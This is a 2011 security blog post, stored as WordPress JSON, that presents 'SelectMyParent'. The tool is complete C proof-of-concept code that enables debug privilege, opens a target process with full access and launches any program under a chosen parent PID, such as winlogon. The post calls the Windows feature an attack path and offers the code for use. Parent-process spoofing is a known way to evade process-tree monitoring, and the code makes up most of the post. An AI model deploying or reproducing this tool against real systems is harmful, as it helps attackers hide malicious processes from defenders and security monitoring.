{"id":71,"date":"2011-09-07T18:05:24","date_gmt":"2011-09-07T18:05:24","guid":{"rendered":"http:\/\/www.gironsec.com\/blog\/?p=71"},"modified":"2013-10-27T10:58:17","modified_gmt":"2013-10-27T10:58:17","slug":"windows-child-process-fail","status":"publish","type":"post","link":"https:\/\/www.gironsec.com\/blog\/2011\/09\/windows-child-process-fail\/","title":{"rendered":"windows child process fail"},"content":{"rendered":"

I ran across this POC code a few months ago. It allows a you to execute processes as a child process of other stuff. Wouldnt it be grand to have your programs run as child processes of system_idle_process or even winlogon?<\/p>\n

Thanks to Visata, now you can! There’s a little feature added to the STARTUPINFOEX struct that allows you to specify a parent process. Oh Microsoft. I love it when you introduce new attack paths to your products. Works on Vista, windows server 2k3, 2k8, and windows 7.
\n<\/p>\n

\n
#include "stdafx.h"<\/span>\r\n#include <windows.h><\/span>\r\n\r\nvoid<\/span> DisplayErrorMessage<\/span>(LPTSTR pszMessage, DWORD dwLastError)\r\n{\r\nHLOCAL hlErrorMessage =<\/span> NULL<\/span>;\r\nif<\/span> (FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM |<\/span> FORMAT_MESSAGE_IGNORE_INSERTS |<\/span> FORMAT_MESSAGE_ALLOCATE_BUFFER, NULL<\/span>, dwLastError, MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL), (PTSTR) &<\/span>amp;hlErrorMessage, 0<\/span>, NULL<\/span>))\r\n{\r\n_tprintf(TEXT("%s: %s"<\/span>), pszMessage, (PCTSTR) LocalLock(hlErrorMessage));\r\nLocalFree(hlErrorMessage);\r\n}\r\n}\r\n\r\nBOOL CurrentProcessAdjustToken<\/span>(void<\/span>)\r\n{\r\nHANDLE hToken;\r\nTOKEN_PRIVILEGES sTP;\r\n\r\nif<\/span>(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES |<\/span> TOKEN_QUERY, &<\/span>amp;hToken))\r\n{\r\nif<\/span> (!<\/span>LookupPrivilegeValue(NULL<\/span>, SE_DEBUG_NAME, &<\/span>amp;sTP.Privileges[0<\/span>].Luid))\r\n{\r\nCloseHandle(hToken);\r\nreturn<\/span> FALSE;\r\n}\r\nsTP.PrivilegeCount =<\/span> 1<\/span>;\r\nsTP.Privileges[0<\/span>].Attributes =<\/span> SE_PRIVILEGE_ENABLED;\r\nif<\/span> (!<\/span>AdjustTokenPrivileges(hToken, 0<\/span>, &<\/span>amp;sTP, sizeof<\/span>(sTP), NULL<\/span>, NULL<\/span>))\r\n{\r\nCloseHandle(hToken);\r\nreturn<\/span> FALSE;\r\n}\r\nCloseHandle(hToken);\r\nreturn<\/span> TRUE;\r\n}\r\nreturn<\/span> FALSE;\r\n}\r\n\r\nint<\/span> _tmain<\/span>(int<\/span> argc, _TCHAR*<\/span> argv[])\r\n{\r\nSTARTUPINFOEX sie =<\/span> {sizeof<\/span>(sie)};\r\nPROCESS_INFORMATION pi;\r\nSIZE_T cbAttributeListSize =<\/span> 0<\/span>;\r\nPPROC_THREAD_ATTRIBUTE_LIST pAttributeList =<\/span> NULL<\/span>;\r\nHANDLE hParentProcess =<\/span> NULL<\/span>;\r\nDWORD dwPid =<\/span> 0<\/span>;\r\n\r\n_putts(TEXT("SelectMyParent v0.0.0.1: start a program with a selected parent process"<\/span>));\r\nif<\/span> (argc !=<\/span> 3<\/span>)\r\n_putts(TEXT("usage: SelectMyParent program pid"<\/span>));\r\nelse<\/span>\r\n{\r\ndwPid =<\/span> _tstoi(argv[2<\/span>]);\r\nif<\/span> (0<\/span> ==<\/span> dwPid)\r\n{\r\n_putts(TEXT("Invalid pid"<\/span>));\r\nreturn<\/span> 0<\/span>;\r\n}\r\nInitializeProcThreadAttributeList(NULL<\/span>, 1<\/span>, 0<\/span>, &<\/span>amp;cbAttributeListSize);\r\npAttributeList =<\/span> (PPROC_THREAD_ATTRIBUTE_LIST) HeapAlloc(GetProcessHeap(), 0<\/span>, cbAttributeListSize);\r\nif<\/span> (NULL<\/span> ==<\/span> pAttributeList)\r\n{\r\nDisplayErrorMessage(TEXT("HeapAlloc error"<\/span>), GetLastError());\r\nreturn<\/span> 0<\/span>;\r\n}\r\nif<\/span> (!<\/span>InitializeProcThreadAttributeList(pAttributeList, 1<\/span>, 0<\/span>, &<\/span>amp;cbAttributeListSize))\r\n{\r\nDisplayErrorMessage(TEXT("InitializeProcThreadAttributeList error"<\/span>), GetLastError());\r\nreturn<\/span> 0<\/span>;\r\n}\r\nCurrentProcessAdjustToken();\r\nhParentProcess =<\/span> OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);\r\nif<\/span> (NULL<\/span> ==<\/span> hParentProcess)\r\n{\r\nDisplayErrorMessage(TEXT("OpenProcess error"<\/span>), GetLastError());\r\nreturn<\/span> 0<\/span>;\r\n}\r\nif<\/span> (!<\/span>UpdateProcThreadAttribute(pAttributeList, 0<\/span>, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &<\/span>amp;hParentProcess, sizeof<\/span>(HANDLE), NULL<\/span>, NULL<\/span>))\r\n{\r\nDisplayErrorMessage(TEXT("UpdateProcThreadAttribute error"<\/span>), GetLastError());\r\nreturn<\/span> 0<\/span>;\r\n}\r\nsie.lpAttributeList =<\/span> pAttributeList;\r\nif<\/span> (!<\/span>CreateProcess(NULL<\/span>, argv[1<\/span>], NULL<\/span>, NULL<\/span>, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL<\/span>, NULL<\/span>, &<\/span>amp;sie.StartupInfo, &<\/span>amp;pi))\r\n{\r\nDisplayErrorMessage(TEXT("CreateProcess error"<\/span>), GetLastError());\r\nreturn<\/span> 0<\/span>;\r\n}\r\n_tprintf(TEXT("Process created: %d<\/span>\\n<\/span>"<\/span>), pi.dwProcessId);\r\nDeleteProcThreadAttributeList(pAttributeList);\r\nCloseHandle(hParentProcess);\r\n}\r\n\r\nreturn<\/span> 0<\/span>;\r\n}\r\n<\/pre>\n<\/div>\n","protected":false},"excerpt":{"rendered":"
I ran across this POC code a few months ago. It allows a you to execute processes as a child process of other stuff. Wouldnt it be grand to have your programs run as child processes of system_idle_process or even winlogon? Thanks to Visata, now you can! There’s a little feature added to the STARTUPINFOEX […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[4],"tags":[],"_links":{"self":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/71"}],"collection":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/comments?post=71"}],"version-history":[{"count":4,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/71\/revisions"}],"predecessor-version":[{"id":570,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/71\/revisions\/570"}],"wp:attachment":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/media?parent=71"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/categories?post=71"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/tags?post=71"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}